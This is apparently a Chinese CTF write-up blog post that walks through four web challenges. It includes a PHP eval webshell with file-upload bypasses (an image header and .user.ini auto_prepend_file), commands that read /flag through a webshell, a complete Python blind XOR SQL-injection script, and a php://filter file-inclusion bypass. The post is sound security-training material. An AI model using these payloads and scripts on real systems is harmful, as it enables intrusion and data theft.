本篇內容
[強網杯 2019]高明的黑客
[SUCTF 2019]CheckIn
[CISCN2019 華北賽區 Day2 Web1]Hack World
[極客大挑戰 2019]Secret File
上一篇 | 目錄 | 下一篇
[強網杯 2019]高明的黑客
訪問網址:
那就直接訪問 www.tar.gz
拿到3000多個php文件。驚呆了我,隨機打開一些php文件發現好多的get、post、eval之類的東西,猜想跟拿shell有關,但是不會啊,這麼多怎麼找有用的shell。
直接百度,發現大佬太強了,我是直接偷了大佬的腳本跑出來了結果,參考大佬博客:[強網杯 2019]高明的黑客(考察代碼編寫能力)。
將www.tar.gz解壓出的src放入自己本地
然後用大佬的腳本跑的結果:
嘗試一下:
xk0SzyKwfzw.php?Efa5BVG=ls /
看到flag字眼,嘗試讀取:
xk0SzyKwfzw.php?Efa5BVG=cat /flag
拿到最終flag。
[SUCTF 2019]CheckIn
訪問,發現了文件上傳,直接上傳php,內容是<?php eval($_GET['a'];?>
,結果不行:
上傳圖片成功
改後綴嘗試一下:
原來是不能含有<?
啊,內容換成這樣<script language='php'>eval($_GET['a']);</script>
再次嘗試:
後端應該調用了php的exif_imagetype()
函數,添加圖片文件頭就可以繞過。再次嘗試:
成功上傳,可惜被當成的是圖片,現在就是要解析這語句,這裏雖然.htaccess
文件也可以正常上傳,但是.htaccess文件只針對Apache、而此處用到的服務器卻是nginx,那麼這裏可以利用.user.ini
,.user.ini利用的範圍比.htaccess更廣,在nginx、apache、IIS裏都可以,只要是以fastcgi運行的php都可以用這個方法。
上傳.user.ini
,內容爲:
GIF89a
auto_prepend_file =shell.png
到它給定的路徑下嘗試一下phpinfo();發現成功
嘗試查看根路徑下的文件:
查看flag:
[CISCN2019 華北賽區 Day2 Web1]Hack World
嘗試後發現過濾了一些東西,
發現異或注入
可以用
那就Fuzz模糊測試一下:
發現過濾了一大堆東西,不過ascii、mid、substr、from等沒有被過濾,空格被過濾直接括號代替,直接上腳本:
import requests
url='http://65eecc40-ec4a-4f27-bb05-b615122057de.node3.buuoj.cn/index.php'
res = ""
for i in range(1,50):
print(i,end='\t')
high = 127
low = 32
mid = (low + high) // 2
while high > low:
payload = "1^(ascii(mid((select(flag)from(flag)),{},1))>{})".format(i,mid)
#print(payload)
data = {"id":payload}
r = requests.post(url, data = data)
if 'Error' in r.text:
low = mid + 1
else:
high = mid
mid = (low + high) // 2
res += chr(int(mid))
print(res)
我採用的是二分法,所以運行速度會比較快,跑完直接出flag。
[極客大挑戰 2019]Secret File
訪問直接右鍵源代碼:
訪問再右鍵源代碼:
訪問action.php卻跳轉到了end.php,中間肯定有什麼,那就Burp抓包。
發現了一個secr3t.php
,訪問
strstr() — 查找字符串的首次出現
stristr() — strstr() 函數的忽略大小寫版本
代碼分析後,發現要GET一個file參數過去,但是不能含有../
、tp
、input
、data
,包括這些的大小寫。不含有這些的話就會包含file指定的文件。
這一看就是php://
僞協議了,而且我直接想到還有php://filter
可以使用,嘗試一下:
發現一串base64密文,直接解密就得到了flag。
========================================================
上一篇-----------------------------------目錄 -----------------------------------下一篇
========================================================
轉載請註明出處。
本文網址:https://blog.csdn.net/hiahiachang/article/details/105411756
========================================================